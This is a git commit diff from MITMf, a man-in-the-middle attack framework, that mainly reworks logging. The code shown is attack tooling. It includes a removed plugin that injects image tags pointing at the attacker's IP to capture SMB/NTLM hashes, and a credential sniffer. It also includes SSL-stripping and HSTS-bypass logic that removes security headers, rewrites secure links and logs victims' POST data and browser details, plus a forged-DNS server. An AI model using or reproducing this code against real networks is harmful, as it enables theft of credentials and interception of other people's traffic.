Mirror of https://github.com/byt3bl33d3r/MITMf.git (synced 2025-07-07 21:42:17 -07:00)

Revamped logging, plugins will be re-added later once refactored

This commit is contained in:
  parent fb0e8a3762
  commit ff0ada2a39

34 changed files with 351 additions and 2352 deletions
@@ -1,46 +1,48 @@
 #!/usr/bin/env python2.7

 # Copyright (c) 2014-2016 Marcello Salvati
 #
 # This program is free software; you can redistribute it and/or
 # modify it under the terms of the GNU General Public License as
 # published by the Free Software Foundation; either version 3 of the
 # License, or (at your option) any later version.
 #
 # This program is distributed in the hope that it will be useful, but
 # WITHOUT ANY WARRANTY; without even the implied warranty of
 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 # General Public License for more details.
 #
 # You should have received a copy of the GNU General Public License
 # along with this program; if not, write to the Free Software
 # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 # USA
 #

 import logging

 from mitmflib.watchdog.observers import Observer
 from mitmflib.watchdog.events import FileSystemEventHandler
 from configobj import ConfigObj

 logging.getLogger("watchdog").setLevel(logging.ERROR) #Disables watchdog's debug messages

-mitmf_logger = logging.getLogger('mitmf')
+log = logging.getLogger('mitmf')

 class ConfigWatcher(FileSystemEventHandler):

-    _instance = None
-    config = ConfigObj("./config/mitmf.conf")
+    @property
+    def config(self):
+        return ConfigObj("./config/mitmf.conf")

-    @staticmethod
-    def getInstance():
-        if ConfigWatcher._instance is None:
-            ConfigWatcher._instance = ConfigWatcher()
-
-        return ConfigWatcher._instance
+    def on_modified(self, event):
+        log.debug("[{}] Detected configuration changes, reloading!".format(self.name))
+        self.on_config_change()

-    def startConfigWatch(self):
+    def start_config_watch(self):
         observer = Observer()
         observer.schedule(self, path='./config', recursive=False)
         observer.start()

-    def getConfig(self):
-        return self.config
-
-    def on_modified(self, event):
-        mitmf_logger.debug("[{}] Detected configuration changes, reloading!".format(self.__class__.__name__))
-        self.reloadConfig()
-        self.onConfigChange()
-
-    def onConfigChange(self):
+    def on_config_change(self):
         """ We can subclass this function to do stuff after the config file has been modified"""
         pass
-
-    def reloadConfig(self):
-        try:
-            self.config = ConfigObj("./config/mitmf.conf")
-        except Exception as e:
-            mitmf_logger.error("Error reloading config file: {}".format(e))
-            pass
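The refactored ConfigWatcher drops the singleton accessor and the cached config: `config` is now a property that re-parses `./config/mitmf.conf` on every access, and subclasses only override `on_config_change()`. A minimal sketch of how a consumer of this new API might look (the `ExampleConsumer` class and its `name` attribute are hypothetical; DNSChef later in this diff follows the same pattern):

```python
# Minimal sketch, assuming the script runs from the repo root so ./config/mitmf.conf exists.
from core.configwatcher import ConfigWatcher

class ExampleConsumer(ConfigWatcher):
    """Hypothetical consumer that re-reads its section whenever mitmf.conf changes."""

    name = "ExampleConsumer"   # on_modified() logs self.name, so a subclass needs one

    def on_config_change(self):
        # self.config re-parses the file on every access, so this is always fresh
        section = self.config['MITMf']['DNS']
        print("DNS port is now {}".format(section['port']))

    def start(self):
        self.on_config_change()    # read the config once at startup
        self.start_config_watch()  # then watch ./config for modifications
```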
@@ -1,4 +1,5 @@
 #! /usr/bin/env python2.7
+# -*- coding: utf-8 -*-

 # Copyright (c) 2014-2016 Marcello Salvati
 #

@@ -18,24 +19,28 @@
 # USA
 #

-from core.utils import SystemConfig
-from plugins.plugin import Plugin
-from plugins.Inject import Inject
-
-class SMBAuth(Inject, Plugin):
-    name     = "SMBAuth"
-    optname  = "smbauth"
-    desc     = "Evoke SMB challenge-response auth attempts"
-    version  = "0.1"
-    has_opts = False
-
-    def initialize(self, options):
-        self.target_ip = SystemConfig.getIP(options.interface)
-        Inject.initialize(self, options)
-        self.html_payload = self._get_data()
-
-    def _get_data(self):
-        return '<img src=\"\\\\%s\\image.jpg\">'\
-               '<img src=\"file://///%s\\image.jpg\">'\
-               '<img src=\"moz-icon:file:///%%5c/%s\\image.jpg\">' % tuple([self.target_ip]*3)
+import logging
+import sys
+
+class logger:
+
+    log_level = None
+    __shared_state = {}
+
+    def __init__(self):
+        self.__dict__ = self.__shared_state
+
+    def setup_logger(self, name, formatter, logfile='./logs/mitmf.log'):
+        fileHandler = logging.FileHandler(logfile)
+        fileHandler.setFormatter(formatter)
+        streamHandler = logging.StreamHandler(sys.stdout)
+        streamHandler.setFormatter(formatter)
+
+        logger = logging.getLogger(name)
+        logger.propagate = False
+        logger.addHandler(streamHandler)
+        logger.addHandler(fileHandler)
+        logger.setLevel(self.log_level)
+
+        return logger
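The new `logger` class uses the shared-state (Borg) pattern: every instance shares `__shared_state`, so a `log_level` set once applies to every logger created afterwards. A sketch of the intended call sequence, mirroring what mitmf.py does later in this diff:

```python
# Sketch of the intended usage of core/logger.py, as wired up later in this commit.
import logging
from core.logger import logger

# Setting log_level on one instance sets it for all instances,
# because every instance shares __shared_state (the Borg pattern).
logger().log_level = logging.DEBUG

formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger('mitmf', formatter)

log.info("goes to stdout and to ./logs/mitmf.log")
```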
@@ -20,7 +20,7 @@ logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 from scapy.all import *
 conf.verb=0

-mitmf_logger = logging.getLogger('mitmf')
+log = logging.getLogger('mitmf')

 DN = open(devnull, 'w')
 pkt_frag_loads = OrderedDict()

@@ -47,13 +47,11 @@ class NetCreds:

     version = "1.0"

-    def sniffer(self, myip, interface):
-        #set the filter to our ip to prevent capturing traffic coming/going from our box
-        sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(myip), store=0)
-        #sniff(iface=interface, prn=pkt_parser, store=0)
+    def sniffer(self, interface):
+        sniff(iface=interface, prn=pkt_parser, store=0)

-    def start(self, myip, interface):
-        t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, myip,))
+    def start(self, interface):
+        t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface,))
         t.setDaemon(True)
         t.start()

@@ -903,7 +901,7 @@ def printer(src_ip_port, dst_ip_port, msg):
         print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
         # All credentials will have dst_ip_port, URLs will not

-        mitmf_logger.info("[NetCreds] {}".format(print_str))
+        log.info("[NetCreds] {}".format(print_str))
     else:
         print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
-        mitmf_logger.info("[NetCreds] {}".format(print_str))
+        log.info("[NetCreds] {}".format(print_str))
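The NetCreds change drops the per-host BPF filter and simply runs `sniff()` in a daemon thread, so the interface no longer needs the local IP passed in. A standalone sketch of that pattern (the `pkt_parser` callback here is a placeholder; scapy and root privileges are assumed):

```python
# Standalone sketch of running a scapy sniffer in a daemon thread (assumes scapy, run as root).
import threading
from scapy.all import sniff

def pkt_parser(pkt):
    # Placeholder callback: the real net-creds pkt_parser extracts credentials from packets.
    print(pkt.summary())

def start_sniffer(interface):
    t = threading.Thread(name='NetCreds', target=sniff,
                         kwargs={'iface': interface, 'prn': pkt_parser, 'store': 0})
    t.setDaemon(True)  # don't keep the process alive just for the sniffer
    t.start()
    return t
```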
@@ -21,7 +21,7 @@ import logging
 import inspect
 import traceback

-mitmf_logger = logging.getLogger("mitmf")
+log = logging.getLogger('mitmf')

 class ProxyPlugins:
     '''

@@ -44,11 +44,11 @@ class ProxyPlugins:
     _instance = None

     plist = []
-    mthdDict = {"connectionMade": "clientRequest",
-                "handleStatus": "serverResponseStatus",
-                "handleResponse": "serverResponse",
-                "handleHeader": "serverHeaders",
-                "handleEndHeaders":"serverHeaders"}
+    mthdDict = {"connectionMade"  : "request",
+                "handleStatus"    : "responsestatus",
+                "handleResponse"  : "response",
+                "handleHeader"    : "responseheaders",
+                "handleEndHeaders": "responseheaders"}

     pmthds = {}

@@ -65,12 +65,12 @@ class ProxyPlugins:
         for p in plugins:
             self.addPlugin(p)

-        mitmf_logger.debug("[ProxyPlugins] Loaded {} plugin/s".format(len(self.plist)))
+        log.debug("[ProxyPlugins] Loaded {} plugin/s".format(len(self.plist)))

     def addPlugin(self,p):
         '''Load a plugin'''
         self.plist.append(p)
-        mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name))
+        log.debug("[ProxyPlugins] Adding {} plugin".format(p.name))
         for mthd,pmthd in self.mthdDict.iteritems():
             try:
                 self.pmthds[mthd].append(getattr(p,pmthd))

@@ -80,7 +80,7 @@ class ProxyPlugins:
     def removePlugin(self,p):
         '''Unload a plugin'''
         self.plist.remove(p)
-        mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name))
+        log.debug("[ProxyPlugins] Removing {} plugin".format(p.name))
         for mthd,pmthd in self.mthdDict.iteritems():
             self.pmthds[mthd].remove(p)

@@ -105,7 +105,7 @@ class ProxyPlugins:

         del args['self']

-        mitmf_logger.debug("[ProxyPlugins] hooking {}()".format(fname))
+        log.debug("[ProxyPlugins] hooking {}()".format(fname))
         #calls any plugin that has this hook
         try:
             for f in self.pmthds[fname]:

@@ -115,7 +115,7 @@ class ProxyPlugins:
                 pass
         except Exception as e:
             #This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
-            mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function")
+            log.error("[ProxyPlugins] Exception occurred in hooked function")
             traceback.print_exc()

         #pass our changes to the locals back down
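Besides the logger rename, this hunk renames the plugin hook methods (e.g. `clientRequest` becomes `request`, `serverHeaders` becomes `responseheaders`). The dispatch mechanism itself is unchanged: `hook()` uses `inspect` to grab the caller's function name and locals, then calls every plugin method registered for that hook. A simplified sketch of that idea (not the exact MITMf code; `MiniDispatcher` is hypothetical):

```python
# Simplified sketch of the dispatch idea behind ProxyPlugins.hook() (hypothetical class, not the real one).
import inspect

class MiniDispatcher(object):
    def __init__(self):
        self.pmthds = {}  # hook name -> list of bound plugin methods

    def register(self, hook_name, func):
        self.pmthds.setdefault(hook_name, []).append(func)

    def hook(self):
        # Determine which function called us and capture its local variables
        frame = inspect.currentframe().f_back
        fname = frame.f_code.co_name
        args = dict(frame.f_locals)
        args.pop('self', None)

        # Call every plugin method registered for that hook, letting it rewrite the arguments
        for func in self.pmthds.get(fname, []):
            result = func(**args)
            if result is not None:
                args = result
        return args
```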
@@ -46,11 +46,7 @@ from core.utils import shutdown
 from mitmflib.dnslib import *
 from IPy import IP

-formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
-dnschef_logger = logging.getLogger('dnschef')
-fileHandler = logging.FileHandler("./logs/dnschef/dnschef.log")
-fileHandler.setFormatter(formatter)
-dnschef_logger.addHandler(fileHandler)
+log = logging.getLogger('mitmf')

 # DNSHandler Mixin. The class contains generic functions to parse DNS requests and
 # calculate an appropriate response based on user parameters.

@@ -70,8 +66,8 @@ class DNSHandler():
             # Parse data as DNS
             d = DNSRecord.parse(data)

-        except Exception, e:
-            dnschef_logger.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0]))
+        except Exception as e:
+            log.info("{} [DNSChef] Error: invalid DNS request".format(self.client_address[0]))

         else:
             # Only Process DNS Queries

@@ -115,7 +111,7 @@ class DNSHandler():
                     # Create a custom response to the query
                     response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)

-                    dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))
+                    log.info("{} [DNSChef] Cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record))

                     # IPv6 needs additional work before inclusion:
                     if qtype == "AAAA":

@@ -184,7 +180,7 @@ class DNSHandler():
                     response = response.pack()

                 elif qtype == "*" and not None in fake_records.values():
-                    dnschef_logger.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))
+                    log.info("{} [DNSChef] Cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records."))

                     response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)

@@ -259,7 +255,7 @@ class DNSHandler():

             # Proxy the request
             else:
-                dnschef_logger.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))
+                log.debug("{} [DNSChef] Proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname))

                 nameserver_tuple = random.choice(nameservers).split('#')
                 response = self.proxyrequest(data, *nameserver_tuple)

@@ -339,13 +335,13 @@ class DNSHandler():
             sock.close()

         except Exception, e:
-            dnschef_logger.warning("[DNSChef] Could not proxy request: {}".format(e))
+            log.warning("[DNSChef] Could not proxy request: {}".format(e))
         else:
             return reply

     def hstsbypass(self, real_domain, fake_domain, nameservers, d):

-        dnschef_logger.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))
+        log.info("{} [DNSChef] Resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain))

         response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)

@@ -435,7 +431,7 @@ class DNSChef(ConfigWatcher):

         return DNSChef._instance

-    def onConfigChange(self):
+    def on_config_change(self):
         config = self.config['MITMf']['DNS']

         self.port = int(config['port'])

@@ -472,8 +468,8 @@ class DNSChef(ConfigWatcher):
                 self.hsts = True

     def start(self):
-        self.onConfigChange()
-        self.startConfigWatch()
+        self.on_config_change()
+        self.start_config_watch()

         try:
             if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
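The "cooking the response" log lines wrap dnslib code that forges a reply with the query's own id and flags. A compact sketch of forging an A record with the standalone `dnslib` package (MITMf bundles the same API as `mitmflib.dnslib`; `cook_a_record` is an illustrative helper, not a function from the codebase):

```python
# Compact sketch of forging an A record with dnslib (MITMf ships it as mitmflib.dnslib).
from dnslib import DNSRecord, DNSHeader, RR, QTYPE, A

def cook_a_record(raw_query, fake_ip):
    d = DNSRecord.parse(raw_query)
    qname = str(d.q.qname)

    # Echo the query id and flags back, and mark the reply as an authoritative answer
    response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
    response.add_answer(RR(qname, QTYPE.A, rdata=A(fake_ip), ttl=300))
    return response.pack()
```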
@@ -9,15 +9,16 @@ from core.servers.smb.KarmaSMB import KarmaSMBServer
 from core.configwatcher import ConfigWatcher
 from core.utils import shutdown

-#Logging is something I'm going to have to clean up in the future
-
 class SMBserver(ConfigWatcher):

     _instance = None
-    impacket_ver = version.VER_MINOR
-    server_type = ConfigWatcher.config["MITMf"]["SMB"]["type"].lower()
-    smbchallenge = ConfigWatcher.config["MITMf"]["SMB"]["Challenge"]
-    smb_port = int(ConfigWatcher.config["MITMf"]["SMB"]["port"])
+
+    def __init__(self):
+        self.impacket_ver = version.VER_MINOR
+        self.server_type = self.config["MITMf"]["SMB"]["type"].lower()
+        self.smbchallenge = self.config["MITMf"]["SMB"]["Challenge"]
+        self.smb_port = int(self.config["MITMf"]["SMB"]["port"])

     @staticmethod
     def getInstance():
@@ -40,7 +40,7 @@ from URLMonitor import URLMonitor
 from CookieCleaner import CookieCleaner
 from DnsCache import DnsCache

-mitmf_logger = logging.getLogger('mitmf')
+log = logging.getLogger('mitmf')

 class ClientRequest(Request):

@@ -74,24 +74,23 @@ class ClientRequest(Request):
             dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
             headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])

-        if 'if-none-match' in headers:
-            del headers['if-none-match']
-
         if 'host' in headers:
             host = self.urlMonitor.URLgetRealHost(str(headers['host']))
-            mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
+            log.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
             headers['host'] = host
             self.setHeader('Host', host)

         if 'accept-encoding' in headers:
             del headers['accept-encoding']
-            mitmf_logger.debug("[ClientRequest] Zapped encoding")
+            log.debug("[ClientRequest] Zapped encoding")
+
+        if 'if-none-match' in headers:
+            del headers['if-none-match']

         if 'if-modified-since' in headers:
             del headers['if-modified-since']

-        if 'cache-control' in headers:
-            del headers['cache-control']
+        headers['pragma'] = 'no-cache'

         return headers

@@ -110,11 +109,11 @@ class ClientRequest(Request):

         if os.path.exists(scriptPath): return scriptPath

-        mitmf_logger.warning("[ClientRequest] Error: Could not find lock.ico")
+        log.warning("[ClientRequest] Error: Could not find lock.ico")
         return "lock.ico"

     def handleHostResolvedSuccess(self, address):
-        mitmf_logger.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
+        log.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
         host = self.getHeader("host")
         headers = self.cleanHeaders()
         client = self.getClientIP()

@@ -152,22 +151,22 @@ class ClientRequest(Request):
             self.dnsCache.cacheResolution(hostparts[0], address)

         if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
-            mitmf_logger.debug("[ClientRequest] Sending expired cookies")
+            log.debug("[ClientRequest] Sending expired cookies")
             self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))

         elif (self.urlMonitor.isSecureFavicon(client, path)):
-            mitmf_logger.debug("[ClientRequest] Sending spoofed favicon response")
+            log.debug("[ClientRequest] Sending spoofed favicon response")
             self.sendSpoofedFaviconResponse()

         elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
             if 'securelink' in headers:
                 del headers['securelink']

-            mitmf_logger.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
+            log.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
             self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))

         else:
-            mitmf_logger.debug("[ClientRequest] Sending request via HTTP")
+            log.debug("[ClientRequest] Sending request via HTTP")
             #self.proxyViaHTTP(address, self.method, path, postData, headers)
             port = 80
             if len(hostparts) > 1:

@@ -176,7 +175,7 @@ class ClientRequest(Request):
             self.proxyViaHTTP(address, self.method, path, postData, headers, port)

     def handleHostResolvedError(self, error):
-        mitmf_logger.debug("[ClientRequest] Host resolution error: {}".format(error))
+        log.debug("[ClientRequest] Host resolution error: {}".format(error))
         try:
             self.finish()
         except:

@@ -186,23 +185,23 @@ class ClientRequest(Request):
         address = self.dnsCache.getCachedAddress(host)

         if address != None:
-            mitmf_logger.debug("[ClientRequest] Host cached: {} {}".format(host, address))
+            log.debug("[ClientRequest] Host cached: {} {}".format(host, address))
             return defer.succeed(address)
         else:
-            mitmf_logger.debug("[ClientRequest] Host not cached.")
+            log.debug("[ClientRequest] Host not cached.")
             self.customResolver.port = self.urlMonitor.getResolverPort()

             try:
-                mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
+                log.debug("[ClientRequest] Resolving with DNSChef")
                 address = str(self.customResolver.query(host)[0].address)
                 return defer.succeed(address)
             except Exception:
-                mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted")
+                log.debug("[ClientRequest] Exception occured, falling back to Twisted")
                 return reactor.resolve(host)

     def process(self):
-        mitmf_logger.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
+        log.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
         host = self.getHeader('host').split(":")[0]

         if self.hsts:
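The `cleanHeaders()` hunk also changes the caching behaviour: instead of deleting `cache-control` when present, the proxy now always injects `pragma: no-cache` and still strips the conditional and encoding headers. A standalone sketch of that scrubbing logic on a plain dict of lower-cased header names (`scrub_request_headers` is an illustrative helper, not a function from the codebase):

```python
# Standalone sketch of the header scrubbing that ClientRequest.cleanHeaders() performs.
def scrub_request_headers(headers):
    """headers: dict of lower-cased request header names -> values."""
    # Never let the server negotiate compression the proxy would have to undo
    headers.pop('accept-encoding', None)

    # Strip conditional-request headers so the server always returns a full body
    headers.pop('if-none-match', None)
    headers.pop('if-modified-since', None)

    # Ask caches along the way not to serve a stored copy
    headers['pragma'] = 'no-cache'
    return headers
```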
@@ -18,7 +18,7 @@

 import logging

-mitmf_logger = logging.getLogger('mitmf')
+log = logging.getLogger('mitmf')

 class DnsCache:

@@ -51,7 +51,7 @@ class DnsCache:
     def setCustomRes(self, host, ip_address=None):
         if ip_address is not None:
             self.cache[host] = ip_address
-            mitmf_logger.debug("[DNSCache] DNS entry set: %s -> %s" %(host, ip_address))
+            log.debug("[DNSCache] DNS entry set: %s -> %s" %(host, ip_address))
         else:
             if self.customAddress is not None:
                 self.cache[host] = self.customAddress
@@ -23,7 +23,7 @@ import string
 from ServerConnection import ServerConnection
 from URLMonitor import URLMonitor

-mitmf_logger = logging.getLogger('mitmf')
+log = logging.getLogger('mitmf')

 class SSLServerConnection(ServerConnection):

@@ -59,11 +59,11 @@ class SSLServerConnection(ServerConnection):
             for v in values:
                 if v[:7].lower()==' domain':
                     dominio=v.split("=")[1]
-                    mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
+                    log.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v)
                     real = self.urlMonitor.real
                     if dominio in real:
                         v=" Domain=%s"%real[dominio]
-                        mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
+                        log.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v)
                 newvalues.append(v)
             value = ';'.join(newvalues)

@@ -87,13 +87,13 @@ class SSLServerConnection(ServerConnection):
         if ((not link.startswith('http')) and (not link.startswith('/'))):
             absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link

-            mitmf_logger.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
-            mitmf_logger.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
+            log.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link)
+            log.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink)
         elif not link.startswith('http'):
             absoluteLink = "http://"+self.headers['host']+link

-            mitmf_logger.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
-            mitmf_logger.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)
+            log.debug("[SSLServerConnection] Found relative link in secure transmission: " + link)
+            log.debug("[SSLServerConnection] New Absolute link: " + absoluteLink)

         if not absoluteLink == "":
             absoluteLink = absoluteLink.replace('&amp;', '&')
@@ -29,8 +29,10 @@ from mitmflib.user_agents import parse
 from twisted.web.http import HTTPClient
 from URLMonitor import URLMonitor
 from core.sergioproxy.ProxyPlugins import ProxyPlugins
+from core.logger import logger

-mitmf_logger = logging.getLogger('mitmf')
+formatter = logging.Formatter("%(asctime)s %(clientip)s [type:%(browser)s-%(browserv)s os:%(clientos)s] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+log = logger().setup_logger("ServerConnection", formatter)

 class ServerConnection(HTTPClient):

@@ -56,7 +58,7 @@ class ServerConnection(HTTPClient):
         self.headers = headers
         self.client = client
         self.printPostData = True
-        self.clientInfo = None
+        self.clientInfo = {}
         self.urlMonitor = URLMonitor.getInstance()
         self.hsts = URLMonitor.getInstance().hsts
         self.app = URLMonitor.getInstance().app

@@ -66,27 +68,18 @@ class ServerConnection(HTTPClient):
         self.contentLength = None
         self.shutdownComplete = False

-    def getPostPrefix(self):
-        return "POST"
-
     def sendRequest(self):
         if self.command == 'GET':
-            try:
-                user_agent = parse(self.headers['user-agent'])
-                self.clientInfo = (user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
-                mitmf_logger.info("{} [type:{}-{} os:{}] {}".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family, self.headers['host']))
-            except Exception as e:
-                mitmf_logger.debug("[ServerConnection] Unable to parse UA: {}".format(e))
-                mitmf_logger.info("{} Sending request: {}".format(self.client.getClientIP(), self.headers['host']))
-                pass
+            log.info(self.headers['host'], extra=self.clientInfo)

-        mitmf_logger.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri))
+        log.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri))

         self.sendCommand(self.command, self.uri)

     def sendHeaders(self):
         for header, value in self.headers.iteritems():
-            mitmf_logger.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
+            log.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
             self.sendHeader(header, value)

         self.endHeaders()

@@ -96,17 +89,26 @@ class ServerConnection(HTTPClient):
             try:
                 postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
                 if len(postdata) > 0:
-                    mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata))
+                    log.warning("POST Data ({}):\n{}".format(self.headers['host'], postdata), extra=self.clientInfo)
             except Exception as e:
                 if ('UnicodeDecodeError' or 'UnicodeEncodeError') in e.message:
-                    mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
-                    pass
+                    log.debug("[ServerConnection] {} Ignored post data from {}".format(self.clientInfo['clientip'], self.headers['host']))

         self.printPostData = True
         self.transport.write(self.postData)

     def connectionMade(self):
-        mitmf_logger.debug("[ServerConnection] HTTP connection made.")
+        log.debug("[ServerConnection] HTTP connection made.")
+
+        user_agent = parse(self.headers['user-agent'])
+
+        self.clientInfo["clientip"] = self.client.getClientIP()
+        self.clientInfo["clientos"] = user_agent.os.family
+        self.clientInfo["browser"] = user_agent.browser.family
+        try:
+            self.clientInfo["browserv"] = user_agent.browser.version[0]
+        except IndexError:
+            self.clientInfo["browserv"] = "Other"
+
         self.plugins.hook()
         self.sendRequest()

@@ -123,7 +125,7 @@ class ServerConnection(HTTPClient):
         code = values['code']
         message = values['message']

-        mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
+        log.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
         self.client.setResponseCode(int(code), message)

     def handleHeader(self, key, value):

@@ -135,18 +137,15 @@ class ServerConnection(HTTPClient):
         if (key.lower() == 'content-type'):
             if (value.find('image') != -1):
                 self.isImageRequest = True
-                mitmf_logger.debug("[ServerConnection] Response is image content, not scanning")
+                log.debug("[ServerConnection] Response is image content, not scanning")

         if (key.lower() == 'content-encoding'):
             if (value.find('gzip') != -1):
-                mitmf_logger.debug("[ServerConnection] Response is compressed")
+                log.debug("[ServerConnection] Response is compressed")
                 self.isCompressed = True

         elif (key.lower()== 'strict-transport-security'):
-            if self.clientInfo is not None:
-                mitmf_logger.info("{} [type:{}-{} os:{}] Zapped a strict-trasport-security header".format(self.client.getClientIP(), self.clientInfo[0], self.clientInfo[1], self.clientInfo[2]))
-            else:
-                mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP()))
+            log.info("Zapped a strict-trasport-security header", extra=self.clientInfo)

         elif (key.lower() == 'content-length'):
             self.contentLength = value

@@ -161,14 +160,17 @@ class ServerConnection(HTTPClient):
         if (self.isImageRequest and self.contentLength != None):
             self.client.setHeader("Content-Length", self.contentLength)

+        self.client.setHeader("Expires", "0")
+        self.client.setHeader("Cache-Control", "No-Cache")
+
         if self.length == 0:
             self.shutdown()

         self.plugins.hook()

-        if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
+        if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG":
             for header, value in self.client.headers.iteritems():
-                mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
+                log.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))

     def handleResponsePart(self, data):
         if (self.isImageRequest):

@@ -180,20 +182,21 @@ class ServerConnection(HTTPClient):
         if (self.isImageRequest):
             self.shutdown()
         else:
+            #Gets rid of some generic errors
             try:
-                HTTPClient.handleResponseEnd(self) #Gets rid of some generic errors
+                HTTPClient.handleResponseEnd(self)
             except:
                 pass

     def handleResponse(self, data):
         if (self.isCompressed):
-            mitmf_logger.debug("[ServerConnection] Decompressing content...")
+            log.debug("[ServerConnection] Decompressing content...")
             data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

         data = self.replaceSecureLinks(data)
         data = self.plugins.hook()['data']

-        mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
+        log.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))

         if (self.contentLength != None):
             self.client.setHeader('Content-Length', len(data))

@@ -206,7 +209,7 @@ class ServerConnection(HTTPClient):
         try:
             self.shutdown()
         except:
-            mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
+            log.info("[ServerConnection] Client connection dropped before request finished.")

     def replaceSecureLinks(self, data):
         if self.hsts:

@@ -214,7 +217,7 @@ class ServerConnection(HTTPClient):
             sustitucion = {}
             patchDict = self.urlMonitor.patchDict

-            if len(patchDict)>0:
+            if patchDict:
                 dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
                 data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)

@@ -222,12 +225,12 @@ class ServerConnection(HTTPClient):
             for match in iterator:
                 url = match.group()

-                mitmf_logger.debug("[ServerConnection][HSTS] Found secure reference: " + url)
-                nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
-                mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
+                log.debug("[ServerConnection][HSTS] Found secure reference: " + url)
+                nuevaurl=self.urlMonitor.addSecureLink(self.clientInfo['clientip'], url)
+                log.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
                 sustitucion[url] = nuevaurl

-            if len(sustitucion)>0:
+            if sustitucion:
